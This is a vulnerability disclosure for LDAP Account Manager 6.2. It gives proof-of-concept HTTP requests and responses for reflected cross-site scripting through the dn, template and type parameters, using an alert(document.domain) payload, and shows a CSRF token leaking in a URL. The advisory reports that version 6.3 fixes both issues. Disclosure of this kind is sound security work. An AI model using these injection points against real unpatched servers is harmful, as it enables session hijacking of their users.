LDAP Account Manager 6.2 Cross Site Scripting

`Affected Software: LDAP Account Manager (6.2)  
Pentester: MichaA KAdzior <michal[dot]kedzior147[at]gmail[dot]com>  
CVE: CVE-2018-8763, CVE-2018-8764  
  
Vulnerabilities :  
*****************  
  
1. Cross-site scripting (reflected) CVE-2018-8763 :  
================================  
  
Risk: HIGH  
  
Summary:  
  
***********  
  
Reflected Cross Site Scripting vulnerability has been found during the  
test. It allows for injecting and executing JavaScript code in the  
application context. JavaScript code is only reflected by the server, which  
differs from Stored Cross-Site Scripting that stores code in the  
application permanently. This vulnerability is mostly exploited in order to  
hijack authenticated users sessions. It can also be used to redirect users  
to malicious websites or steal application user's keystokes.  
  
Proof:  
  
*******  
  
I. Vulnerable parameter dn:  
  
=====================  
  
Request with payload [%3cscript%3ealert(document.domain)%3c%2fscript%3e]:  
  
GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=add_attr_  
form&server_id=1&dn=cn%3xxxxx%2cou%3dpeople%2cdc%3dpl%2cdc%  
3ds2-eu%2cdc%3dxxxx%2cdc%3dlocalru0bz%3cscript%3ealert(  
document.domain)%3c%2fscript%3eu89iu HTTP/1.1  
  
Host: XXXXXXXXXX  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
Referer: XXXXXXXXX  
  
Cookie: XXXXXXXXXX  
  
  
Response with execution point [<script>alert(document.domain)</script>]:  
  
HTTP/1.1 200 OK  
  
Cache-Control: no-store, no-cache, must-revalidate  
  
Content-Length: 12887  
  
Content-Security-Policy: frame-ancestors 'self'  
  
Content-Type: text/html; charset="UTF-8"  
  
Date: Fri, 02 Mar 2018 09:52:18 GMT  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Pragma: no-cache  
  
Server: Apache/2.4.29 (Debian)  
  
Vary: Accept-Encoding  
  
X-Frame-Options: sameorigin  
  
Connection: close  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "  
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto">  
  
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"  
/><title>LDAP Account Manager (6.2) - </title><link rel="shortcut icon"  
href="images/favicon.ico" type="image/vnd.microsoft.icon" /><link  
type="text/css" rel="stylesheet" href="css/default/style.css" /><link  
type="text/css" rel="stylesheet" media="all"  
href="js/jscalendar/calendar-blue.css"  
title="blue" />  
  
<script type="text/javascript" src="js/ajax_functions.js"></script><script  
type="text/javascript" src="js/jscalendar/calendar.js"></script>  
  
</head>  
  
[a|]  
  
</div></td><td class="body" style="width: 80%;"><div id="ajBODY">  
  
<table class="sysmsg"><tr><td class="icon" rowspan="2"><img  
src="images/default/error-big.png" alt="error" /></td><td  
class="head">Error</td></tr><tr><td class="body">The entry  
(cn=xxxxx,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=localru0bz<  
script>alert(document.domain)</script>u89iu) does not  
exist.</td></tr></table>  
  
<table class="body"><tr><td></td></tr></table></div></td></tr>  
  
</table></body></html>  
  
  
  
II.  
  
Vulnerable parameter template:  
  
========================  
  
Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%  
3e]:  
  
GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=rename_  
form&server_id=1&dn=cn%3Dtechnic%2Cou%3Dpeople%2Cdc%  
3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal&template=  
noneuaax6%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev7rfn  
HTTP/1.1  
  
Host: xxxxxxx  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
  
Response with execution point ["><script>alert(document.domain)</script>]:  
  
HTTP/1.1 200 OK  
  
Cache-Control: no-store, no-cache, must-revalidate  
  
Content-Length: 22141  
  
Content-Security-Policy: frame-ancestors 'self'  
  
Content-Type: text/html; charset="UTF-8"  
  
Date: Fri, 02 Mar 2018 11:22:27 GMT  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Pragma: no-cache  
  
Server: Apache/2.4.29 (Debian)  
  
Vary: Accept-Encoding  
  
X-Frame-Options: sameorigin  
  
Connection: close  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "  
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto">  
  
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"  
/><title>LDAP Account Manager (6.2) -  
cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=local  
</title><link rel="shortcut icon" href="images/favicon.ico"  
type="image/vnd.microsoft.icon" /><link type="text/css" rel="stylesheet"  
href="css/default/style.css" /><link type="text/css" rel="stylesheet"  
media="all" href="js/jscalendar/calendar-blue.css" title="blue" />  
  
<script type="text/javascript" src="js/ajax_functions.js"></script><script  
type="text/javascript" src="js/jscalendar/calendar.js"></script>  
  
</head>  
  
[a|]  
  
</div></td><td class="body" style="width: 80%;"><div id="ajBODY">  
  
<table class="body"><tr><td><h3 class="title">Rename  
<b>cn=technic</b></h3><h3 class="subtitle">DN:  
<b>cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxx,dc=local</b></h3><center>Rename  
<b>cn=technic</b> to a new object.<br /><br /><form  
action="cmd.php?cmd=rename" method="post" /><input type="hidden"  
name="server_id" value="1" /><input type="hidden" name="dn"  
value="cn%3Dtechnic%2Cou%3Dpeople%2Cdc%3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal"  
/><input type="hidden" name="template" value="noneuaax6"><script>  
alert(document.domain)</script>v7rfn" /><input type="text" name="new_rdn"  
size="30" value="cn=technic" /><input type="submit" value="Rename"  
/></form></center>  
  
</td></tr></table></div></td></tr>  
  
</table></body></html>  
  
  
  
III.  
  
Vulnerable parameter type:  
  
=====================  
  
Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%  
3e]:  
  
GET /lam/templates/upload/masscreate.php?type=userawvpj%  
22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev0car HTTP/1.1  
  
Host: xxxxx  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
Referer: xxxxxx  
  
Cookie: xxxxxx  
  
Response with execution point ["><script>alert(document.domain)</script>]:  
  
HTTP/1.1 200 OK  
  
Cache-Control: no-store, no-cache, must-revalidate  
  
Content-Length: 8418  
  
Content-Security-Policy: frame-ancestors 'self'  
  
Content-Type: text/html; charset=UTF-8  
  
Date: Fri, 02 Mar 2018 11:10:05 GMT  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Pragma: no-cache  
  
Server: Apache/2.4.29 (Debian)  
  
Vary: Accept-Encoding  
  
X-Frame-Options: sameorigin  
  
Connection: close  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "  
http://www.w3.org/TR/html4/loose.dtd">  
  
<html>  
  
<head>  
  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
  
<meta http-equiv="pragma" content="no-cache">  
  
<meta http-equiv="cache-control" content="no-cache"><link rel="shortcut  
icon" type="image/x-icon" href="../../graphics/favicon.ico">  
  
<link rel="icon" href="../../graphics/logo136.png">  
  
<title>LDAP Account Manager (directoryservice:389)</title>  
  
[a|]  
  
<div class="userawvpj"><script>alert(document.domain)</script>v0car-bright  
smallPaddingContent"><div class="title">  
  
<h2 class="titleText">Account creation via file upload</h2>  
  
</div><p>&nbsp;</p>  
  
<p>  
  
Here you can create multiple accounts by providing a CSV file.</p>  
  
<p>&nbsp;</p>  
  
<form enctype="multipart/form-data" action="masscreate.php" method="post">  
  
<table>  
  
<tr>  
  
<td >  
  
<div class="nowrap">Account type</div>  
  
</td>  
  
<td>  
  
<select class="ui-corner-all" name="type" id="type" size="1"  
onchange="changeVisibleModules(this);"  
tabindex="1">  
  
<option value="group">Groups</option>  
  
<option value="user">Users</option>  
  
</select>  
  
</td>  
  
[a|]  
  
Remediation:  
  
***************  
Vulnerabilities has been fixed by vendor in version 6.3  
  
  
  
2. CSRF token in URL CVE-2018-8764  
  
=================  
  
Risk: LOW  
  
  
Summary:  
  
************  
  
Sensitive information within URLs may be logged in various locations,  
including the user's browser, the web server, and any forward or reverse  
proxy servers between the two endpoints. URLs may also be displayed  
on-screen, bookmarked or emailed around by users. They may be disclosed to  
third parties via the Referer header when any off-site links are followed.  
Placing session tokens into the URL increases the risk that they will be  
captured by an attacker.  
  
Proof:  
  
*******  
  
Request witch reveals CSRF token [sec_token=1045368361844]:  
  
GET /lam/templates/misc/ajax.php?function=passwordChange&sec_token=1045368361844  
HTTP/1.1  
  
Host: xxxx  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
Referer: xxxxx  
  
Cookie: xxxxxx  
  
  
Remediation:  
  
***************  
  
Vulnerability has been fixed by vendor in version 6.3  
  
  
`